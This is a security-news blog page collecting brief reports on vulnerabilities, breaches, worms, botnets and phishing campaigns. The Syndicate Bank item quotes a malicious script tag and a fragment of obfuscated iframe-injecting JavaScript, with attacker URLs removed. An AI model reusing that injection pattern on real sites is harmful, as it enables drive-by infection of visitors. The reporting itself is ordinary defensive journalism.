OpenOffice 2 TIFF Parsing Integer Overflow Vulnerabilities

1821 Comments Off on OpenOffice 2 TIFF Parsing Integer Overflow Vulnerabilities

Some vulnerabilities have been reported in
OpenOffice, which potentially can be exploited by malicious people to
compromise a user’s system.

The vulnerabilities are caused due to integer overflows when processing
certain tags within TIFF images. This can be exploited to cause
heap-based buffer overflows by e.g. tricking a user into opening a
specially crafted document.

Successful exploitation may allow the execution of arbitrary code.

The vulnerabilities are reported in versions prior to 2.3.

Update to version 2.3. 

Hacker Gained Access To Data On Millions Of TD Ameritrade Customers

1821 Comments Off on Hacker Gained Access To Data On Millions Of TD Ameritrade Customers

Online brokerage TD Ameritrade Holding Corp. announced today that a
hacker broke into one of its databases and stole personally identifying
information for some of its 6.3 million customers.

An online advisory
and letters to account holders disclosed that names, e-mail addresses,
phone numbers and home addresses were taken in the data breach. Client
assets, along with user IDs, personal identification numbers and
passwords, were not stored in the compromised database.

Full Story at 


Windows worm targets Skype users

1821 Comments Off on Windows worm targets Skype users

An instant-messaging worm has started spreading to PCs running Windows
by using Skype to chat up potential victims in an attempt to convince
them to download and run the malicious software.

The worm, described in a blog post
written by eBay’s Skype subsidiary, can converse with victims in at
least three different languages: Latvian, Russian, and English.
Antivirus firms and eBay have already assigned a plethora of names to
the digital pest, including Ramex (Skype), Pykspa (Symantec), Skipi
(F-Secure), and Pykse (McAfee and others). 


Custom-built botnet steals eBay accounts

1821 Comments Off on Custom-built botnet steals eBay accounts

Online auction site eBay
has been targeted by identity thieves, who are wielding a botnet that
uses brute force to uncover valid account login info, an Israeli
security company said Monday.

The attacks against eBay may have started as long ago as early
August, said Ofer Elzam, of Aladdin Knowledge Systems Ltd. Elzam and
his researchers have not been successful in notifying eBay of their
weekend findings.

According to Elzam, the product manager of Aladdin’s eSafe
threat protection line, the brute force attacks are launched by a large
botnet that the identity thieves have built using a sophisticated,
multi-stage campaign that begins with compromised legitimate Web sites.

Story continues at 


Better Business Bureau Scam Updated

1821 Comments Off on Better Business Bureau Scam Updated

Websense® Security Labs(TM) has received reports of a new variant of an
email attack that was originally launched early this year. The spoofed
email purports to be from the Better Business Bureau (BBB). The message
claims that a complaint has been filed against the recipient’s company.

the email attack contained an attachment that the victim would need to
open in order to become infected. The new variant is slightly different.

new message uses a tactic employed by other, more-successful email
attacks, such as the recent Storm worm. Instead of including an
attachment in the email, the body of the email contains a link to an
external Web site from which the payload is downloaded if the link is
accessed. This method allows the attack to bypass many attachment
filters at the email gateway.

Link to our previous BBB alert:

Details … 

Storm adds YouTube lures

1821 Comments Off on Storm adds YouTube lures

The Storm Trojan / Bot continues to
spread and is now using a YouTube video to lure users. The latest
version has a variety of subjects and email bodies but now uses the
filename video.exe.

Email subject example: Sheesh man what are you thinkin.

Upon connecting to the URL, which is
referenced as a YouTube link but is actually a Storm IP, the same
exploit code used in past attacks attempts to run. As in the past if
users are not vulnerable they will get a page displayed that  requests
they run the code manually such as in the screenshot below:

 Websense Alert


Attackers probing for vulnerable Windows servers

1821 Comments Off on Attackers probing for vulnerable Windows servers

Attackers are probing for Windows servers running Trend Micro Inc.‘s ServerProtect antivirus software, researchers warned.

Early today, Symantec Corp.‘s
DeepSight threat network monitored a major spike in traffic over TCP
port 5168, which is related to the remote procedure call service in
ServerProtect. “This may indicate an ongoing mass-scanning and
exploitation attempt trying to exploit vulnerable systems for the newly
disclosed vulnerabilities,” said Symantec analyst Pukhraj Singh in an
alert issued to corporate customers.

Continues at 


Syndicate Bank site compromised

1821 Comments Off on Syndicate Bank site compromised

Websense® Security LabsT has discovered that the official site for Indian Syndicate Bank (,
was compromised with a malicious script that attempts to exploit
multiple vulnerabilities. When customers visit the web site, a
malicious JavaScript file (e.js) is executed and creates two additional
iframes in the page.

<script src=http://< URL REMOVED >/e.js></script>

Snippet of js code:

document.writeln(“\/\/xxxx mca By Mr.0wen\/\/”);

%220%22%20FraMebOrder %3D%220%22%3E%3C\/IFraMe%3E\”));”);
document.writeln(“\/\/xxxx mca By Mr.0wen\/\/”);

JavaScript from e.js (seen above) creates two new IFRAME elements
within the page. One IFRAME attempts to load exploit code and the other
creates several additional IFRAMEs that contain advertisement-related
content. The exploit will try to load a Trojan Downloader (qq.exe)
which will contact a remote server to download the following Trojan
Downloader and Backdoor:

http://< URL REMOVED >/hxw/hx/200512.exe
http://< URL REMOVED >/hxw/hx/dd.exe

The site appears to have been cleaned a few hours ago.


Zero-Day Bug In Yahoo Messenger Pops Up

1821 Comments Off on Zero-Day Bug In Yahoo Messenger Pops Up

Researchers at McAfee are reporting that they’ve reproduced a reported zero-day vulnerability in the Yahoo Messenger Webcam.

Karthik Raman, a researcher with McAfee, first reported on a Tuesday blog entry
that Chinese researchers were claiming to have found a zero-day bug in
Yahoo Messenger. On Wednesday, Raman’s fellow McAfee researcher Wei
Wang, noted in a blog entry that they have been able to reproduce the vulnerability on Messenger V8.1.0.413.

Continues at 

Storm Warning: Worm Threat Escalates

1821 Comments Off on Storm Warning: Worm Threat Escalates

The Storm worm has grown into an online siege 10 times larger than any
other e-mail attack in the last two years, amassing a botnet of nearly
2 million computers, with worrying implications, researchers say.

Before Storm, an average day saw about 1 million virus-laden e-mails
crossing the Internet, says Adam Swidler, senior manager of software
security firm Postini. On July 24, researchers tracked 46.2 million
malicious messages, more than 99% of them from the Storm worm.

The number of zombie computers the Storm worm authors have amassed has
skyrocketed in the past two months, says SecureWorks senior researcher
Joe Stewart. From the first of January to the end of May, there were
2,815 bots launching Storm attacks. By the end of July, that number had
leaped to 1.7 million. “It’s been building with exponential growth,”
says Stewart. “It’s one of the largest botnets I’ve ever heard of.”

Continues at 


© 2017 DP's Bits & Bytes.
WordPress Theme & Icons by N.Design Studio. Provided by WPMU DEV -The WordPress Experts   Hosted by Microsoft MVPs
Entries RSS Comments RSS Log in